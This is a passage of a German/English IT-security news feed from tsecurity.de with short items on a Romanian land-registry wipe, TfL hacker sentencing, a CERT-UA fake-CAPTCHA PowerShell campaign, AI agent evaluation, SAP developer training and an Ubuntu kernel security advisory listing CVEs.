<guid isPermaLink="true">https://tsecurity.de/de/3682470/it-security-nachrichten/bytetobreach-loescht-rumaenisches-grundbuch-immobilienhandel-steht-still/</guid>
<pubDate>Tue, 21 Jul 2026 03:06:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-byte-to-breach-land-registry-outage-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BUKAREST / LONDON (IT BOLTWISE) – Ein Angriff der Gruppe ByteToBreach hat in Rumänien die gesamte Grundbuchdatenbank gelöscht und damit den Immobilienhandel weitgehend lahmgelegt. Notare können seit dem Vorfall keine neuen Transaktionen mehr veranlassen, weil Eigentumsnachweise und Details aus den Grundakten nicht abrufbar sind. Laut Behörden wird parallel an einer vollständigen Neuaufsetzung der IT-Infrastruktur gearbeitet. […]</p>
<div><a href="https://www.it-boltwise.de/bytetobreach-loescht-rumaenisches-grundbuch-immobilienhandel-steht-still.html">... den vollständigen Artikel <strong>»ByteToBreach löscht rumänisches Grundbuch – Immobilienhandel steht still«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/bytetobreach-loescht-rumaenisches-grundbuch-immobilienhandel-steht-still.html">ByteToBreach löscht rumänisches Grundbuch – Immobilienhandel steht still</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[A single AI agent conversation can look perfect and still be broken, leaders from LangChain, Conviva and CoreWeave said at VB Transform 2026]]></title>
<description><![CDATA[A single AI agent conversation can look flawless scored on its own and still point to a broken product. That gap is driving a shift in how enterprises evaluate agents, away from scoring individual traces and toward comparing cohorts of users against a baseline.At VB Transform 2026, Harrison Chase...]]></description>
<link>https://tsecurity.de/de/3682142/it-nachrichten/a-single-ai-agent-conversation-can-look-perfect-and-still-be-broken-leaders-from-langchain-conviva-and-coreweave-said-at-vb-transform-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682142/it-nachrichten/a-single-ai-agent-conversation-can-look-perfect-and-still-be-broken-leaders-from-langchain-conviva-and-coreweave-said-at-vb-transform-2026/</guid>
<pubDate>Mon, 20 Jul 2026 22:48:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A single AI agent conversation can look flawless scored on its own and still point to a broken product. That gap is driving a shift in how enterprises evaluate agents, away from scoring individual traces and toward comparing cohorts of users against a baseline.</p><p>At<a href="https://venturebeat.com/vbtransform2026"> VB Transform 2026</a>, <!-- -->Harrison Chase, CEO of LangChain; Hui Zhang, CTO and co-founder of Conviva; and Emmanuel Turlay, director of engineering at CoreWeave, described that shift, along with a parallel move toward cheaper, narrower judge models.</p><p>Agent-as-judge — judging one AI agent's output with another — hasn't replaced LLM-as-judge, which Chase said remains the default. The larger tension, Zhang said, is between automated judging, whether by LLM or agent, and human review.</p><p>"You have scalable but ungrounded, whether it's agents as judge or LLMs as judge, you grade the outcome, you grade the work. It still is very difficult to ground it and then you use humans and that's just not scalable," Zhang said. "The whole industry is facing this, which poison you want to pick."</p><h2>Evaluation criteria now function as the product spec</h2><p>That gap — a conversation that scores well but still signals a broken product — is what teams try to close by building an exhaustive evaluation suite before they ship anything. Chase said that doesn't work.</p><p>"We sometimes see teams that have almost eval paralysis," Chase said. "They're like, this is an eval set, I can't launch it. The best teams launch and then iterate."</p><p>Chase framed evaluation criteria as a living specification, not a one-time test suite: a product requirements document — the standard software-development spec for what an application should do. "Evals are like the new PRD," he said. "They define what your agent should and shouldn't do."</p><p>Turlay described hitting the same failure from a different angle. "I was trying to reach 100% coverage for my tests, and I still had bugs in production," he said — a test suite that looked complete but still missed what mattered, the same gap Chase was describing with evals.</p><p>Broad, always-on monitoring, he said, catches more real failures than an exhaustive pre-launch test suite. Teams should set up wide online checks first, use those to identify failure classes as they occur, then build a targeted offline evaluation set around the problems that surface.</p><h2>Why scoring traces one at a time is a mistake</h2><p>Even a well-built evaluation process can still score the wrong thing. Zhang's objection is to how most teams run evaluation: sampling traces, whether 50 of them or a full population, scoring each in isolation. That approach misses a signal that only shows up when comparing cohorts of users against a baseline, a method Zhang calls contrastive analysis.</p><p>Zhang illustrated it with a retail example: a shopper asks an agent for a running shoe ahead of a half marathon, the agent asks qualifying questions, and the shopper buys a shoe. Scored individually, that interaction looks fine. But the clarification ratio, how many follow-up questions an agent asks before completing a task, came in three times higher than baseline for that shoe category across the full user population. A second metric, how often shoppers finished their purchase outside the conversation, was five times higher than baseline for the same category.</p><p>Neither number is visible from a single trace. Both point to a debuggable, category-specific problem. Zhang said the industry also lacks a second data source: what happens before, between and after the conversation, not just the trace itself.</p><h2>Sizing the judge to the job</h2><p>Once contrastive analysis flags which category is actually broken, the next problem is what watches for it going forward — and at what cost. Turlay's rule was to start with the most capable model available to prove a task is solvable, then work down. If it can't be done with a top-tier model, he said, it won't work with a smaller one. Once a pattern proves viable, teams can sample a fraction of traffic instead of judging every interaction, and move simpler tasks like binary classification to smaller open source models.</p><p>LangChain took that further, fine-tuning its own model to detect when a user believes the agent made a mistake, a signal Chase calls perceived error. "The model we fine-tuned was a Qwen model," he said, referring to Alibaba's open source family. Combining hand labeling with distillation, the result performed well. "Same as [Claude]Sonnet, for, depending on how we served it, either 10 to 100x cost reduction," Chase said.</p><p>Not every guardrail needs a model. Chase pointed to Claude Code's own guardrails as proof: regexes, the common programming technique for finding and validating patterns in code. "A lot of the guardrails they had were just regexes," he said. "They weren't small LLMs, they were just regexes."</p><h2>LLM-as-judge doesn't mean human-in-the-loop disappears</h2><p>The bigger question is whether using LLM as a judge removes the need for a human in the loop.</p><p>Turlay pointed to accountability, drawing on his prior work at a self-driving car company. His team compressed data intake and retraining into a two-week cycle for shipping a new model to the car. Even then, someone still had to sign off.</p><p>"I felt confident on behalf of the company to say this model should go into the car," he said. The same logic extends to legal, finance and healthcare. "Before we can remove a human to say, I endorse this and I take responsibility legally for it, it's going to be a while before agents can do that on their own."</p><p>Zhang agreed a human has to remain the guardian on corner cases, even as automation eventually runs at a scale that beats individual human accuracy — machines can see more at the pattern level. </p><p>Chase went further: that human check isn't just a safety net. "Human in the loop is really important for building trust in how these agentic systems work, and also really important for memory and learning from systems," he said. "There has to be interactions in order for the system to learn."</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TfL-Hacker verurteilt: Social Engineering, verschlüsselte Chats und Jahre Haft - it boltwise]]></title>
<description><![CDATA[Zwei TfL-Hacker wurden zu je fünf Jahren und sechs Monaten Haft verurteilt. Social Engineering über den Support, verschlüsselte Chats und ...]]></description>
<link>https://tsecurity.de/de/3681863/hacking/tfl-hacker-verurteilt-social-engineering-verschluesselte-chats-und-jahre-haft-it-boltwise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681863/hacking/tfl-hacker-verurteilt-social-engineering-verschluesselte-chats-und-jahre-haft-it-boltwise/</guid>
<pubDate>Mon, 20 Jul 2026 19:37:48 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Zwei TfL-<b>Hacker</b> wurden zu je fünf Jahren und sechs Monaten Haft verurteilt. Social Engineering über den Support, verschlüsselte Chats und ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake-CAPTCHAs in PowerShell-Angriffen: CERT-UA warnt vor Malware-Ketten]]></title>
<description><![CDATA[KIEW / LONDON (IT BOLTWISE) – CERT-UA meldet eine neue Kampagne, in der Angreifer mit gefälschten CAPTCHA-Checks kompromittierte Webseiten in die Abwehr umleiten. Betroffene sollen über eine scheinbar harmlose Anweisung einen PowerShell-Befehl ausführen, der weitere Malware nachlädt. Zusätzlich n...]]></description>
<link>https://tsecurity.de/de/3681829/it-security-nachrichten/fake-captchas-in-powershell-angriffen-cert-ua-warnt-vor-malware-ketten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681829/it-security-nachrichten/fake-captchas-in-powershell-angriffen-cert-ua-warnt-vor-malware-ketten/</guid>
<pubDate>Mon, 20 Jul 2026 19:23:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-fake-captcha-powershell-intrusion.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-fake-captcha-powershell-intrusion.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-fake-captcha-powershell-intrusion-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-fake-captcha-powershell-intrusion-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-fake-captcha-powershell-intrusion-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-fake-captcha-powershell-intrusion-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-fake-captcha-powershell-intrusion-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">KIEW / LONDON (IT BOLTWISE) – CERT-UA meldet eine neue Kampagne, in der Angreifer mit gefälschten CAPTCHA-Checks kompromittierte Webseiten in die Abwehr umleiten. Betroffene sollen über eine scheinbar harmlose Anweisung einen PowerShell-Befehl ausführen, der weitere Malware nachlädt. Zusätzlich nutzt die Kampagne Cloaking-House-ähnliche Traffic-Filter und eine EtherHiding-Technik, um CAPTCHA-Inhalte dynamisch einzubetten. Parallel finden sich Android-Backdoors in […]</p>
<div><a href="https://www.it-boltwise.de/fake-captchas-in-powershell-angriffen-cert-ua-warnt-vor-malware-ketten.html">... den vollständigen Artikel <strong>»Fake-CAPTCHAs in PowerShell-Angriffen: CERT-UA warnt vor Malware-Ketten«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/fake-captchas-in-powershell-angriffen-cert-ua-warnt-vor-malware-ketten.html">Fake-CAPTCHAs in PowerShell-Angriffen: CERT-UA warnt vor Malware-Ketten</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TfL-Hacker verurteilt: Social Engineering, verschlüsselte Chats und Jahre Haft]]></title>
<description><![CDATA[LONDON / IT BOLTWISE – Zwei mutmaßliche Hacker wurden wegen eines Cyberangriffs auf Transport for London (TfL) zu jeweils fünf Jahren und sechs Monaten Haft verurteilt. Der Angriff hatte monatelange Betriebsstörungen ausgelöst und persönlichen Daten von Millionen Kundinnen und Kunden in die Hände...]]></description>
<link>https://tsecurity.de/de/3681827/it-security-nachrichten/tfl-hacker-verurteilt-social-engineering-verschluesselte-chats-und-jahre-haft/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681827/it-security-nachrichten/tfl-hacker-verurteilt-social-engineering-verschluesselte-chats-und-jahre-haft/</guid>
<pubDate>Mon, 20 Jul 2026 19:23:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-tfl-hack-sentencing-social-engineering.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-tfl-hack-sentencing-social-engineering.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-tfl-hack-sentencing-social-engineering-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-tfl-hack-sentencing-social-engineering-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-tfl-hack-sentencing-social-engineering-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-tfl-hack-sentencing-social-engineering-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-tfl-hack-sentencing-social-engineering-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON / IT BOLTWISE – Zwei mutmaßliche Hacker wurden wegen eines Cyberangriffs auf Transport for London (TfL) zu jeweils fünf Jahren und sechs Monaten Haft verurteilt. Der Angriff hatte monatelange Betriebsstörungen ausgelöst und persönlichen Daten von Millionen Kundinnen und Kunden in die Hände Dritter gebracht. Laut Gericht spielten Social-Engineering-Methoden eine zentrale Rolle, bei denen Angreifer […]</p>
<div><a href="https://www.it-boltwise.de/tfl-hacker-verurteilt-social-engineering-verschluesselte-chats-und-jahre-haft.html">... den vollständigen Artikel <strong>»TfL-Hacker verurteilt: Social Engineering, verschlüsselte Chats und Jahre Haft«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/tfl-hacker-verurteilt-social-engineering-verschluesselte-chats-und-jahre-haft.html">TfL-Hacker verurteilt: Social Engineering, verschlüsselte Chats und Jahre Haft</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[DSAG warnt vor Bildungsschulden bei SAP-Entwicklern]]></title>
<description><![CDATA[width="1024" height="682" sizes="auto, (max-width: 1024px) 100vw, 1024px">Die DSAG fordert Unternehmen auf, ihre ABAP-Entwickler gezielt für moderne SAP-Technologien wie Clean Core und ABAP Cloud weiterzubilden.SAP



Viele Unternehmen investieren derzeit mehrstellige Millionenbeträge in die Mode...]]></description>
<link>https://tsecurity.de/de/3681715/it-security-nachrichten/dsag-warnt-vor-bildungsschulden-bei-sap-entwicklern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681715/it-security-nachrichten/dsag-warnt-vor-bildungsschulden-bei-sap-entwicklern/</guid>
<pubDate>Mon, 20 Jul 2026 19:01:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"> width="1024" height="682" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Die DSAG fordert Unternehmen auf, ihre ABAP-Entwickler gezielt für moderne SAP-Technologien wie Clean Core und ABAP Cloud weiterzubilden.</figcaption></figure><p class="imageCredit">SAP</p></div>



<p class="wp-block-paragraph">Viele Unternehmen investieren derzeit mehrstellige Millionenbeträge in die Modernisierung ihrer SAP-Landschaften. Doch nach Einschätzung der Deutschsprachigen SAP-Anwendergruppe (<a href="https://dsag.de/" target="_blank" rel="noreferrer noopener">DSAG</a>) wird dabei ein entscheidender Erfolgsfaktor häufig unterschätzt: die Qualifizierung der eigenen Entwickler.</p>



<p class="wp-block-paragraph">In einer neuen <a href="https://impulsant.dsag.de/wp-content/uploads/2026/07/CIO-Upskilling.pdf" target="_blank" rel="noreferrer noopener">Handlungsempfehlung</a> fordert der Anwenderverband CIOs auf, die Weiterbildung von SAP-Entwicklern nicht als freiwillige Schulungsmaßnahme, sondern als strategisches Investitionsprogramm zu behandeln. Gut ausgebildete Entwickler seien die Voraussetzung für stabile, wartbare Eigenentwicklungen ohne wachsende technische Schulden. Ohne Fortbildung beim Upgrade auf S/4HANA blieben die Potenziale der neuen Technologien ungenutzt.</p>



<h2 class="wp-block-heading">Veraltetes Know-how wird zum Projektrisiko</h2>



<p class="wp-block-paragraph">Wie die Autoren ausführen, verfügen zwar viele ABAP-Entwickler über jahrzehntelange Erfahrung mit SAP R/3 oder ECC und besäßen umfangreiches Prozesswissen. Mit S/4HANA, Clean Core und ABAP Cloud hätten sich die Entwicklungsparadigmen jedoch grundlegend verändert.</p>



<p class="wp-block-paragraph">Langfristig drohe dies zu schlechten Architekturentscheidungen, aufwendigen Workarounds und Eigenentwicklungen, die bei jedem Release nachgepflegt werden müssten, zu führen, so die DSAG. Auch viele Business Consultants orientierten sich noch zu stark an klassischen GUI-Transaktionen und berücksichtigten moderne Fiori-Technologien zu wenig.</p>



<p class="wp-block-paragraph">Die Folge seien sogenannte “Bildungsschulden”, meint die SAP-Anwendervereinigung. Diese blieben zunächst unsichtbar, machten sich später jedoch in Form längerer Projekte, steigender Wartungskosten und einer wachsenden Abhängigkeit von externen Dienstleistern bemerkbar.</p>



<h2 class="wp-block-heading">Kompetenzaufbau darf nicht erst im Projekt beginnen</h2>



<p class="wp-block-paragraph">Besonders kritisch sehen die DSAG-Autoren den Zeitpunkt der Weiterbildung. Wer erst während eines laufenden S/4HANA-Migrationsprojekts mit dem Kompetenzaufbau beginne, erhöhe das Projektrisiko erheblich. Fehlendes Wissen über CDS, RAP oder Fiori führe zu Architekturentscheidungen, die später teuer korrigiert werden müssten. Gleichzeitig lasse sich der notwendige Lernaufwand kaum parallel zum Tagesgeschäft bewältigen.</p>



<p class="wp-block-paragraph">Aber auch nach abgeschlossener Migration müssen sich die SAP-Entwickler laut DSAG weiter fortbilden. Wer danach so weiterarbeite wie auf ECC, verpasse die Möglichkeiten aktueller SAP-Technologien – auch wenn technisch alles noch funktioniere, warnen die Autoren. Gleichzeitig könnten sie das Gelernte gleich anwenden, womit sich das neue Wissen verfestigt.</p>



<h2 class="wp-block-heading">KI ersetzt keine Entwicklerkompetenz</h2>



<p class="wp-block-paragraph">Laut DSAG gilt auch für die Entwicklung im SAP-Umfeld: KI-Werkzeuge können zwar Code erzeugen und erklären. Voraussetzung sei dabei jedoch, dass Entwickler die Ergebnisse auch fachlich bewerten könnten. „Nur wer versteht, was guter SAP-Code ist, kann KI als Beschleuniger einsetzen“, so die Autoren. Andernfalls fungiere KI als Risikoverstärker und beschleunige im schlimmsten Fall lediglich die Entstehung technischer Schulden.</p>



<p class="wp-block-paragraph">Voraussetzung für den erfolgreichen KI-Einsatz seien deshalb solide Software-Engineering-Kenntnisse, automatisierte Tests und ein Verständnis moderner SAP-Entwicklung.</p>



<h2 class="wp-block-heading">Die fünf Empfehlungen der DSAG</h2>



<p class="wp-block-paragraph">Die DSAG empfiehlt CIOs deshalb, Weiterbildung fest in ihre Transformationsstrategie zu integrieren. Konkret nennt der Verband fünf Maßnahmen, nämlich:</p>



<ul class="wp-block-list">
<li><strong>verbindliche Lernpfade</strong> für unterschiedliche Rollen wie ABAP-, CAP- oder Integrationsentwickler sowie Business Consultants zu definieren,</li>



<li><strong>geeignete Sandbox- und Testumgebungen</strong> bereitzustellen,</li>



<li>Fortbildungszeiten <strong>verbindlich in die Kapazitätsplanung aufzunehmen</strong>,</li>



<li>Schulungen <strong>zeitlich mit Migrations- und Modernisierungsprojekten zu verzahnen</strong>, sowie</li>



<li>bestehende <strong>DSAG-Leitfäden als Referenzrahmen für die Entwicklung zu nutzen</strong>.</li>
</ul>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8569-1: Linux kernel (HWE) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3681610/unix-server/usn-8569-1-linux-kernel-hwe-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681610/unix-server/usn-8569-1-linux-kernel-hwe-vulnerabilities/</guid>
<pubDate>Mon, 20 Jul 2026 18:18:40 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that the Linux kernel did not properly handle shared page
fragments during socket buffer operations, collectively known as Dirty
Frag. A logic flaw existed in the XFRM ESP-in-TCP subsystem and in the
RxRPC networking subsystem when processing paged fragments. A local
attacker could use this to escalate privileges, or possibly escape a
container. (CVE-2026-43284, CVE-2026-43500, CVE-2026-45998, CVE-2026-46000)

It was discovered that a logic flaw existed in the XFRM ESP-in-TCP
subsystem in the Linux kernel when handling socket buffer fragments. This
flaw is known as Fragnesia. A local attacker could use this to escalate
privileges, or possibly escape a container. (CVE-2026-43503,
CVE-2026-46300)

Qualys discovered that a race condition existed in the ptrace subsystem of
the Linux kernel when privileged processes are exiting. An unprivileged
local attacker could use this issue to expose sensitive information.
(CVE-2026-46333)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contain a memory leak when handling AppArmor notifications. A local
attacker could use this to cause resource exhaustion. (CVE-2026-47326)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contain a NULL pointer dereference when handling AppArmor notifications. A
local attacker could use this to cause a kernel oops. (CVE-2026-47327)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contained an invalid free when handling AppArmor notifications. A local
attacker could use this to corrupt kernel memory. (CVE-2026-47328)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contained insufficient validation of AppArmor notification responses. A
local attacker could use this to allow crafted responses to be processed.
(CVE-2026-47329)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0 used
an uninitialized variable when handling AppArmor notifications. A local
attacker could use this to cause incorrect caching of data.
(CVE-2026-47330)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contained an out-of-bounds (OOB) read when handling AppArmor notifications.
A local attacker could use this to cause information disclosure of kernel
memory. (CVE-2026-47332)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contained a out-of-bounds (OOB) read when handling AppArmor notifications.
A local attacker could use this to cause kernel memory corruption and,
theoretically, influence processing of AppArmor policies. (CVE-2026-47333)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contained incorrect holding of locks when handling AppArmor notifications.
A local attacker could use this to cause a kernel panic or deadlock.
(CVE-2026-47334)

Tristan Madani and Trevor Lawrence have each independently discovered that
Ubuntu Linux kernel 6.8, 6.17 and 7.0 contained a NULL pointer dereference
when handling AppArmor network socket mediation. A local attacker could use
this to cause a kernel oops. (CVE-2026-47337)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - PSP security protocol;
  - ARM64 architecture;
  - PowerPC architecture;
  - RISC-V architecture;
  - S390 architecture;
  - User-Mode Linux (UML);
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Intel NPU Driver;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Ublk userspace block driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - TPM device driver;
  - Clock framework and drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - EDAC drivers;
  - EFI core;
  - FWCTL subsystem;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Microsoft Hyper-V drivers;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - I3C subsystem;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device core drivers;
  - IOMMU subsystem;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - NVIDIA Tegra memory controller driver;
  - IBM Advanced System Management driver;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - MediaTek network drivers;
  - NTB driver;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Pin controllers subsystem;
  - Chrome hardware platform drivers;
  - ACPI WMI driver;
  - x86 platform drivers;
  - Generic PM domains;
  - MediaTek PM domains;
  - Power supply drivers;
  - Remote Processor subsystem;
  - MPAM driver;
  - Amlogic Meson reset controller drivers;
  - S/390 drivers;
  - SCSI subsystem;
  - NVIDIA Tegra Control Backbone (CBB) driver;
  - SPI subsystem;
  - Greybus lights staging drivers;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - USB Device Class drivers;
  - ULPI bus;
  - USB Gadget drivers;
  - USB Type-C support driver;
  - TI TPS6598x USB Power Delivery controller driver;
  - USB over IP driver;
  - vDPA drivers;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM AMD SEV Guest driver;
  - Xen hypervisor drivers;
  - 9P distributed file system;
  - File systems infrastructure;
  - AFS file system;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - HugeTLB file system;
  - Journaling layer for block devices (JBD2);
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Overlay file system;
  - Diskquota system;
  - SMB network file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - DRM TTM subsystem;
  - Codetag library;
  - Control group (cgroup);
  - Kernel CPU control infrastructure;
  - Memory management;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Freescale ENETC Ethernet drivers;
  - Memory Management;
  - KVM subsystem;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Bluetooth subsystem;
  - Networking core;
  - Netfilter;
  - Network traffic control;
  - Tracing infrastructure;
  - User-space API (UAPI);
  - io_uring subsystem;
  - IPC subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - Locking primitives;
  - Padata parallel execution mechanism;
  - Scheduler infrastructure;
  - Timer subsystem;
  - Cryptographic library;
  - Scatterlist API;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - 802.1Q VLAN protocol;
  - B.A.T.M.A.N. meshing protocol;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IPv6 networking;
  - MAC80211 subsystem;
  - Multipath TCP;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Phonet protocol;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - XFRM subsystem;
  - Integrity Measurement Architecture(IMA) framework;
  - Landlock security;
  - SELinux security module;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - QCOM ASoC drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2026-31532, CVE-2026-31574, CVE-2026-31575, CVE-2026-31576,
CVE-2026-31577, CVE-2026-31578, CVE-2026-31579, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31589, CVE-2026-31590, CVE-2026-31591, CVE-2026-31592,
CVE-2026-31593, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31600,
CVE-2026-31601, CVE-2026-31602, CVE-2026-31603, CVE-2026-31604,
CVE-2026-31605, CVE-2026-31606, CVE-2026-31607, CVE-2026-31608,
CVE-2026-31609, CVE-2026-31610, CVE-2026-31611, CVE-2026-31612,
CVE-2026-31613, CVE-2026-31614, CVE-2026-31615, CVE-2026-31616,
CVE-2026-31617, CVE-2026-31618, CVE-2026-31619, CVE-2026-31620,
CVE-2026-31621, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31686, CVE-2026-31694, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31700,
CVE-2026-31701, CVE-2026-31702, CVE-2026-31703, CVE-2026-31704,
CVE-2026-31705, CVE-2026-31706, CVE-2026-31707, CVE-2026-31708,
CVE-2026-31709, CVE-2026-31710, CVE-2026-31711, CVE-2026-31712,
